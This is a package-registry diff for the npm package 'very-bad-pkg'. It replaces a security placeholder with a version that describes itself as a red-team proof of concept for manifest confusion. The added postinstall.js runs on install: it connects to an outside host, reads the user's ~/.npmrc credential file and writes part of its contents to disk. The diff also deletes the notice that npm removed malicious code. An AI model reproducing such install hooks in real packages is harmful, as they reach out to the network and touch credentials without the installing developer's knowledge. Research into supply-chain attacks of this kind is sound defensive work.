very-bad-pkg 0.0.1-security → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of very-bad-pkg might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +10 -4
- package/postinstall.js +43 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
console.log('listen!')
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
|
-
"name": "
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
2
|
+
"name": "imposter-pkg",
|
|
3
|
+
"version": "1.0.1",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"keywords": ["manifest-confusion", "npm", "poc"],
|
|
6
|
+
"description": "A PoC for manifest confusion (for testing purposes)",
|
|
7
|
+
"scripts": {
|
|
8
|
+
"test": "echo \"This pkg looks OK!\""
|
|
9
|
+
},
|
|
10
|
+
"author": "listen.dev Red Team",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const path = require('path');
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
|
+
|
|
6
|
+
const OUTBOUND_URL = 'https://fntlnz.wtf'; // Replace with the desired outbound URL
|
|
7
|
+
const OUTPUT_FILE_PATH = '/test/hello_dolphins.txt'; // Modify the file path as needed
|
|
8
|
+
|
|
9
|
+
function makeOutboundConnection() {
|
|
10
|
+
https.get(OUTBOUND_URL, (res) => {
|
|
11
|
+
console.log(`Connected to ${OUTBOUND_URL}, statusCode: ${res.statusCode}`);
|
|
12
|
+
// Do something with the response if needed
|
|
13
|
+
res.on('data', (data) => {
|
|
14
|
+
// Process the response data if necessary
|
|
15
|
+
});
|
|
16
|
+
}).on('error', (err) => {
|
|
17
|
+
console.error('Error making outbound connection:', err.message);
|
|
18
|
+
});
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
function writeFileWithDescription() {
|
|
22
|
+
try {
|
|
23
|
+
// Read npm_package_description from .npmrc
|
|
24
|
+
const npmrcFilePath = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
|
|
25
|
+
const npmrcContent = fs.readFileSync(npmrcFilePath, 'utf8');
|
|
26
|
+
const npmPackageDescriptionMatch = npmrcContent.match(/npm_package_description=(.*)/);
|
|
27
|
+
if (!npmPackageDescriptionMatch) {
|
|
28
|
+
throw new Error('npm_package_description not found in .npmrc');
|
|
29
|
+
}
|
|
30
|
+
const npmPackageDescription = npmPackageDescriptionMatch[1];
|
|
31
|
+
|
|
32
|
+
// Write the file with the npm_package_description
|
|
33
|
+
const fileContent = `hello dolphins! npm_package_description: ${npmPackageDescription}\n`;
|
|
34
|
+
fs.writeFileSync(OUTPUT_FILE_PATH, fileContent, 'utf8');
|
|
35
|
+
console.log(`File written to ${OUTPUT_FILE_PATH}`);
|
|
36
|
+
} catch (error) {
|
|
37
|
+
console.error('An error occurred while writing the file:', error);
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
// Call the functions to make the outbound connection and write the file
|
|
42
|
+
makeOutboundConnection();
|
|
43
|
+
writeFileWithDescription();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=very-bad-pkg for more information.
|